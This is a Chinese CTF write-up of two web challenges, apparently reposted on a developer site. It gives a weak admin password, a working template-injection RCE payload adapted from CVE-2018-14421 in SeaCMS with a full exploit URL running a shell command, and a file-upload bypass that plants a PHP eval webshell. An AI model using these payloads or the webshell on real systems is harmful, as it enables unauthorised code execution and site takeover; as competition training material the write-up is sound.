内容简介:有登陆功能但是没有注册功能,所以要么sqli要么爆破密码,最终爆破得到弱口令进入后台。Backup有提示源码文件和flag文件在服务器上的位置审计源码,发现其实是CVE-2018-14421的简化版本,使用如下payload来构成rce
有登陆功能但是没有注册功能,所以要么sqli要么爆破密码,最终爆破得到弱口令进入后台。
admin admin123
Backup有提示源码文件和flag文件在服务器上的位置
审计源码,发现其实是CVE-2018-14421的简化版本,使用如下payload来构成rce
zeroyu {if:1)$GLOBALS['_G'.'ET'][zeroyu]($GLOBALS['_G'.'ET'][cool]);die();//}{end if}
注意一点这个id的值是要看响应包的。
http://101.71.29.5:10039//web/index.php?r=content%2Fshow&id=8&zeroyu=system&cool=cat%20/tmp/flag
最后读取flag
flag{65bb1dd503d2a682b47fde40571598f4}
参考
1.这篇文章是从payload出发来分析触发点的,很具有借鉴意义–>
CVE-2018-14421——Seacms后台getshell分析文章中提到一点
htm文件在开发中就只是模板文件,需要有控制器来渲染,渲染一般都是有include,render,render_template等等代码关键词,所以我们可以通过这个来确定控制器。
0x02 upload
题目描述:
http://101.71.29.5:10031/index.php
题目分析:
1.上传 php 文件–>上传失败并提示It is not a image
2.burp抓包并修改Content-Type: image/jpeg和文件后缀名–>依旧上传失败
3.猜测可能是判断了文件的格式,比如文件头什么的,所以我在图片里藏了一段PHP代码进行上传–>成功上传,但是无法解析
4.目标是Apache机器,进而构造 mu.jpg.php
后缀名进行上传–>上传成功并且成功解析
<?php @eval($_POST['pass']) ?>
5.使用cknife进行连接并找到flag
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 第二届网易前端技术大会-启航
- 技术活动 | 【免费】杭州第二届测试沙龙(报名中)
- 百花盛放,展露锋芒丨第二届MAXP大赛决赛落幕
- 第二届“全球程序员节”:北京分会场即将火力全开
- 大咖云集 第二届“全球程序员节”将在西安开幕
- “数字世界 码动未来”第二届全球程序员节正式开幕
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。